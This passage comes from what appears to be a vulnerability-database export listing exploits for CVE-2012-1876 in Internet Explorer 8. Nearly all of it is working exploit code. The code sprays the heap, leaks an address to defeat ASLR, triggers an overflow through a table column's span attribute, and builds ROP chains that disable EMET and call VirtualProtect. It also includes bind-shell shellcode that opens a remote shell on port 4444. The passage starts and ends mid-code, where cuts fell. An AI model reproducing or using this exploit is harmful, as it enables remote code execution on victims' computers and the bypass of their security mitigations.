"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-87111"}, {"lastseen": "2017-11-19T13:11:44", "description": "No description provided by source.", "published": "2014-10-10T00:00:00", "type": "seebug", "title": "Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87309", "id": "SSV:87309", "sourceData": "\n <!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\r\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\r\n-->\r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop39 = rop.substring(4,8);\r\n var rop40 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\r\n var rop = rop.toString(16);\r\n var rop43 = rop.substring(4,8);\r\n var rop44 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)\r\n shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\r\n shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0558%u0000"); // ROP Protections offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // NULL\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n \r\n // Store various pointers here\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u14eb"); // NOPs\r\n shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer\r\n shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET string\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // Store various pointers here\r\n \r\n // EMET disable part 0x02\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +\r\n "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +\r\n "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +\r\n "%ufe6a%ud6ff");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87309", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "edition": 1, "published": "2014-07-01T00:00:00", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EXPLOITPACK:022449B08C2DE005F39553B5E709DE12", "href": "", "sourceData": "<!--\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\n** Offensive Security Research Team\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\n** Affected Software: Internet Explorer 8\n** Vulnerability: Fixed Col Span ID\n** CVE: CVE-2012-1876\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\n-->\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\n var getprocaddr = getprocaddr.toString(16);\n var getprocaddr1 = getprocaddr.substring(4,8);\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= 